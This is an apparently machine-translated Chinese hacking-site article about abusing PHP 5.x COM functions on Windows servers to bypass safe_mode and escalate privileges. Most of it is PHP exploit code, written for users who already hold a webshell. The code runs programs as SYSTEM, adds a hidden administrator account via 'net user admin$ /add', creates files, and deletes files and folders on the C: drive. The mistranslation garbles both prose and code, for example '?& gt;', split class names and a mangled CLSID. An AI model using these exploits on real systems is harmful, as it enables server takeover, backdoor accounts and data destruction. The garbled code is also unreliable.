PHP 5. x COM functions to mention the right vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201132150
Type myhack58
Reporter 佚名
Modified 2011-10-26T00:00:00


PHP is“hypertext pre-processing language”for Hypertext Preprocessor acronym, is an HTML embedded language. It can be more than the CGI or Perl more rapid implementation of dynamic web pages. PHP has a very powerful function, all of CGI or JavaScript functions, PHP can be achieved, supports almost all popular databases as well asoperating system. The recent functions are so powerful, the use of such a wide range of PHP but there is a major vulnerability, which is PHP 5. x COM functions safe_mode and disable_function bypass vulnerability. It can be achieved provided the right, which is a lot of friends in the dream. Here we come first overall presentation about vulnerabilities, since I level is limited, please forgive inaccuracies. The vulnerability used by the COM function only in the Windows environment, PHP only exists. net 的 支持 需要 PHP5 以及 .net Runtime. Vulnerability the use of the function without the need for special installation, is PHP kernel part. Windows environment PHP by default support these extensions, no additional load other extensions to call to vulnerability function. Now part of the large and medium-sized site like to use PHP+Apache+Windows To set up, in this case, PHP vulnerabilities of the combat surface will be very large, especially in the now right more and more difficult situation, I think a lot of servers because of this vulnerability and fall. According to the vulnerability discoverer content published, the vulnerability requires the use of php. ini has the following settings. My test environment is PHP5. 2. 3+Apache2. 2. 3+Windows XP SP2, in my tests, found does not have to be strictly in accordance with such a configuration, you can test it yourself and see.

safe_mode = On disable_functions = com_load_typelib open_basedir = htdocs Here we one by one to see the vulnerability of content and use.

compatUI. dll in the RunApplication function This exploit test code is as follows. <? php $compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}'); //加载 compatUI.dll $compatUI->RunApplication("something", "notepad.exe", 1); //Run Notepad ?& gt;

Save it as a PHP file, and put it on the server, and then use IE to access it. After running IE is no echo, as shown in Figure 1, but in fact Notepad is already running, but is a SYSTEM permission, as it is by the system service to run, so the inherited SYSTEM privileges, as shown in Figure 2.



Take advantage of this vulnerability, we can run already uploaded the good of the Trojan, to achieve WebShell. right. Of course, if you're sufficiently bored, you can also write into a loop, let the server run a lot of Notepad, to achieve D. O. S.

Wscript Run command

This exploit test code is as follows. <? php $wscript = new COM('wscript. shell'); //要 用 到 wscript.exe $wscript->Run("cmd.exe /c calc.exe");//运行 calc.exe ?& gt;

To access the script, on the server appear in the SYSTEM permissions calc. exe process, as shown in Figure 3. As long as we play about imagination, modify the script, you can add an administrator account, the specific code as follows.


<? php $wscript = new COM('wscript. shell');$wscript->Run("cmd.exe /c net user admin$ /add"); $wscript->Run("cmd.exe /c net localgroup administrators admin$ /add"); ?& gt;

To access the script, you can add the administrator is successful, the SYSTEM permissions to says is a nightmare, as shown in Figure 4


wshom. ocx in the OpenTextFile OpenTextFile can be used to create a file, wherein the presence of the vulnerability test code is as follows.

<? php $mPath = str_repeat("..\\",2 0); $FSO = new COM('Scripting. FileSystemObject');//used to wshom. ocx $FSO->OpenTextFile($mPath."bat. bat", 8, true); //created on the server files, although this function is used to open the file, but the file does not exist it is created. ?& gt;

Sure enough in area C, the root directory appears this batch file bat. bat, as shown in Figure 5


wshom. ocx in the DeleteFile This function can delete files on the server, we have to be careful to use the test code below.

<? php $mPath = str_repeat("..\\",2 0); $FSOdelFile = new COM('Scripting. FileSystemObject'); //Use a wshom. ocx $FSOdelFile->DeleteFile($mPath.".\\*. dat", True); //Delete the C zone root directory of all the dat file?& gt;

wshom. ocx in the DeleteFolder Using this function you can delete the folders on the server, it horror. The test code is as follows:

<? php $mPath = str_repeat("..\\",2 0); $FSOdelFolder = new COM('Scripting. FileSystemObject'); //Using the wshom. ocx $FSOdelFolder->DeleteFolder($mPath.".\\ 1 1", True); //Delete a specific folder ?& gt;

After the visit, successfully removed c:\1 1 This folder.

because. dll in the Create FUNCTION to create the account This exploit test code is as follows:

<? php $user = new COM('{60664CAF-AF0D-0 0 0 4-A300-5C7D25FF22A0}'); //利用 shgina.dll$user->Create("asd"); //Create the account asd ?& gt;

However, here to note that the use of this vulnerability to create accounts just belong to users group, as shown in Figure 6


On PHP 5. x COM functions exploits is to introduce to here, the test code has with the text provided, everyone according to their needs, making the appropriate modifications. However, remind everyone about, more than a few exploits the premise is that we already have a WebShell, then it can be uploaded for providing the right script, remember Oh